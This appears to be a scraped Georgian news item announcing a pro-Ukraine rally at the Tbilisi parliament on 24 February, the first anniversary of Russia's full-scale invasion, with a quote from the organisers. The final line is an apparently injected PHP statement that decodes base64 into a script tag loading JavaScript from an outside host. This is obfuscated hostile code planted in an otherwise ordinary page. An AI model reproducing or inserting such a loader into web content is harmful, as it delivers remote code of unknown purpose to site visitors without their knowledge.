celsiusi
ავერსი შნაიდერი

უკრაინაში ომის დაწყებიდან ერთი წლის თავზე თბილისში უკრაინის მხარდამჭერი აქცია იმართება. აქცია დღეს, 24 თებერვალს, 19:00 საათზე პარლამენტთან არის დაგეგმილი.

“ქართველ ხალხს, კარგად გვესმის ამ ბოროტებასთან ბრძოლის ფასი, თავისუფლების ფასი, ღირსების ფასი, მტერზე გამარჯვების ფასი. ამიტომ ქართველი ხალხი ომის დაწყების წუთიდან განსაკუთრებულად სოლიდარულები ვართ გმირი უკრაინელი ხალხის მიმართ, უკრაინის მიმართ. 24 თებერვალს, უკრაინაში სრულმასშტაბიანი ომის დაწყების დღეს, გავერთიანდებით და კიდევ ერთხელ მტკიცე მხარდაჭერას გამოვუცხადებთ თავისუფლებისთვისა და მშვიდობისთვის მებრძოლ გმირებს”,-აცხადებენ აქციის ორგანიზატორები.

რუსეთმა უკრაინაში სრულმასშტაბიანი ომი 2022 წლის 24 თებერვალს დაიწყო. თითქმის ერთი წლის განმავლობაში რუსეთი ბომბავს არა მარტო სამხედრო ობიექტებს, არამედ სამოქალაქო ინფრასტრუქტურას და საცხოვრებელ სახლებსაც. რუსეთის სამხედრო აგრესიას ათასობით სამოქალაქო პირი შეეწირა, მილიონობით უკრაინელს კი ქვეყნის დატოვება მოუწია.

339
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");